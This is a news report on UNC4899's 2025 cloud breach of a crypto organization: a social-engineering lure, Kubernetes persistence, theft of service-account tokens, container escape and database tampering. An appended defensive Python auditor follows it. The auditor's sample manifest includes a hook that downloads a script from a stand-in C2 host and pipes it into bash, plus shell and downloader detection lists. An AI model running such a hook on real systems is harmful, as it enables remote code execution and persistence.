
A North Korean threat actor known as UNC4899 is suspected of being behind a sophisticated cloud breach campaign that targeted crypto organizations in 2025 and stole millions of dollars in cryptocurrencies.
This activity has been determined with some confidence to be from a state-sponsored adversary and has also been tracked under the code names Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor.
“This incident is notable for its combination of social engineering, exploitation of peer-to-peer (P2P) data transfer mechanisms of devices from individuals to businesses, workflow exploitation, and ultimately migration to the cloud to adopt Living Off the Cloud (LOTC) technology,” Google noted in its Cloud Threat Horizons report for the first half of 2026 (PDF), shared with The Hacker News.
Once in the cloud environment, the attackers allegedly exploited legitimate DevOps workflows to obtain credentials, breach container boundaries, and modify Cloud SQL databases to facilitate cryptocurrency theft.
According to Google Cloud, the attack chain begins with a developer’s personal device compromising a corporate workstation and moves to the cloud to make unauthorized changes to financial logic.
It all started when the threat actors used social engineering to trick a developer into downloading an archive file under the guise of collaborating on an open source project. The developer then transferred the same file to their corporate device via AirDrop.
“The victim used an AI-assisted integrated development environment (IDE) to manipulate the contents of the archive and ultimately execute the embedded malicious Python code, generating and executing a binary disguised as a Kubernetes command-line tool,” Google said.
This binary then connected to an attacker-controlled domain and acted as a backdoor into the victim’s corporate machine, giving the attacker the means to migrate into the Google Cloud environment using an authenticated session and available credentials. This step was followed by an initial reconnaissance phase aimed at gathering information about various services and projects.

The attack advanced to the next phase with the discovery of a bastion host, whose multi-factor authentication (MFA) policy attributes the attacker modified to gain access to it and perform additional reconnaissance, such as navigating to specific pods within the Kubernetes environment.
UNC4899 then took a living-off-the-cloud (LotC) approach and set up a persistence mechanism by modifying the Kubernetes deployment configuration so that bash commands ran automatically whenever a new pod was created. The command itself downloaded a backdoor.
Here are some of the other steps taken by threat actors:
- The Kubernetes resource associated with the victim’s CI/CD platform was modified to inject a command that printed the service account token into the logs. The attackers thereby obtained the token of a highly privileged CI/CD service account and escalated their privileges, enabling lateral movement that specifically targeted pods handling network policy and load balancing.
- Stolen service account tokens were used to authenticate to sensitive infrastructure pods running in privileged mode, escape the containers, and deploy backdoors for persistent access.
- The threat actors conducted another round of reconnaissance before turning to workloads that manage customer information such as user identities, account security, and cryptocurrency wallet data. From these they extracted static database credentials that were insecurely stored in the pods’ environment variables.
- The credentials were then misused to access the production database via the Cloud SQL Auth Proxy and execute SQL commands to modify user accounts, including resetting passwords and updating MFA seeds for several high-value accounts.
- The compromised accounts were used to extract millions of dollars in digital assets.
The incident “highlights the significant risks posed by P2P data transfer methods and other data bridges, privileged container modes, and insecure handling of secrets in cloud environments,” Google said. “Organizations should adopt a layered defense-in-depth strategy that strictly validates identities, restricts data transfer at endpoints, and enforces strict isolation within cloud runtime environments to limit the scope of an intrusion event.”
To combat this threat, organizations are recommended to implement context-aware access and phishing-resistant MFA, ensure that only trusted images are deployed, isolate compromised nodes from establishing connections with external hosts, monitor unexpected container processes, implement robust secret management, and enforce policies that disable or restrict peer-to-peer file sharing using AirDrop or Bluetooth and the mounting of unmanaged external media on corporate devices.
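The weak configurations this chain relied on (privileged containers, static credentials in pod environment variables, and a deployment spec altered to run a shell command at pod start) can be caught by auditing Deployment manifests before and after they reach the cluster. The checker below is an added example, not code from Google's report or from the victim; the Deployment JSON and host names are constructed, and matching secrets by variable-name hints is an assumption about naming conventions.

```python
import json

# Constructed sample Deployment (as `kubectl get deploy -o json` would return it),
# combining the weaknesses the report names. Not a real victim manifest.
SAMPLE_DEPLOYMENT = json.loads("""
{"kind": "Deployment", "metadata": {"name": "wallet-api"},
 "spec": {"template": {"spec": {"containers": [{
   "name": "api", "image": "registry.example.invalid/wallet-api:1.4.2",
   "securityContext": {"privileged": true},
   "env": [{"name": "DB_PASSWORD", "value": "static-db-password"},
           {"name": "API_KEY", "valueFrom": {"secretKeyRef": {"name": "db", "key": "k"}}}],
   "lifecycle": {"postStart": {"exec": {"command":
       ["/bin/bash", "-c", "curl -s http://c2.example.invalid/stage | bash"]}}}
 }]}}}}
""")

SECRET_HINTS = ("PASSWORD", "SECRET", "TOKEN", "KEY", "CREDENTIAL")  # assumed naming
SHELLS = {"sh", "bash", "/bin/sh", "/bin/bash"}
DOWNLOADERS = ("curl", "wget")

def _is_shell_download(cmd):
    """True when a command list runs a shell whose script fetches from the network."""
    if not cmd:
        return False
    return cmd[0] in SHELLS and any(d in " ".join(cmd) for d in DOWNLOADERS)

def audit_deployment(deploy):
    """Return (container, finding) pairs for: privileged mode, literal secrets in
    env vars (a `value` sits in the pod spec; `valueFrom` does not), and startup
    commands or lifecycle hooks that pipe a download into a shell."""
    findings = []
    pod = deploy["spec"]["template"]["spec"]
    for c in pod.get("containers", []) + pod.get("initContainers", []):
        name = c["name"]
        if c.get("securityContext", {}).get("privileged"):
            findings.append((name, "privileged container"))
        for e in c.get("env", []):
            if "value" in e and any(h in e["name"].upper() for h in SECRET_HINTS):
                findings.append((name, f"literal secret in env var {e['name']}"))
        for phase in ("postStart", "preStop"):
            hook = c.get("lifecycle", {}).get(phase, {}).get("exec", {})
            if _is_shell_download(hook.get("command")):
                findings.append((name, f"{phase} hook pipes a download into a shell"))
        if _is_shell_download((c.get("command") or []) + (c.get("args") or [])):
            findings.append((name, "container command pipes a download into a shell"))
    return findings

if __name__ == "__main__":
    for container, finding in audit_deployment(SAMPLE_DEPLOYMENT):
        print(f"{container}: {finding}")
```

The same function can be run in an admission webhook or a CI step over every Deployment, and its output diffed against a known-good baseline so that a later mutation of the spec stands out.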
